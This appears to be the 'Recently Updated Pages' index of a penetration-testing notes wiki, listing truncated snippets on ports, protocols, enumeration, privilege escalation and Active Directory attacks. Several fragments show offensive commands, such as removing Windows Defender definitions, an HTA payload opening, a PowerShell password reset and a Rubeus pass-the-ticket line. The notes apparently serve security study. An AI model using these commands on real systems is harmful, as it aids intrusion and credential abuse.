Recently Updated Pages

Encryption/Hashing Block Ciphers ECB - Electronic Code Block CBC - Cipher Block Chaining OF...

The below is not an extensive list. The rest of the responses are either deprecated or experime...

POP POP protocol is session based. Changes occur only after you type QUIT. USER [username] # t...

Opens ports between 512-514 Service Port Protocol rcp 514 TCP rexec ...

Port Service 7 ECHO 9 Discard 13 Daytime 17 QotD (Quote of the...

The operating system sets the initial TTL value or application creating the IP packet. Here are s...

Via command prompt cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinit...

Tools required <https://github.com/its-a-feature/KeytabParser> <https://github.com/sosdave/KeyT...

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Ap...

Linux - SSH On your host cat ~/.ssh/id_rsa.pub # if you don't have one create run: ssh-key -t r...

Blast AV and enable RDP with hashes cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRu...

PowerUp Upload the following script to the host /usr/share/windows-resources/powersploit/Pri...

HTA payloads Ping <html> <head> <script language="JScript"> var shell = new ActiveXObject(...

Automated approach autorecon TARGET_IP Manual approach nmap TARGET_IP -p- --min-rate 1400 -sV ...

Personal Checklist [ ] Enumeration [ ] nmap [ ] autorecon [ ] HTTP/S? [ ] gobuster/d...

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Appl...

You will need to first upload the binaries to the target, either via a meterpreter shell or power...

Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Forc...

Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt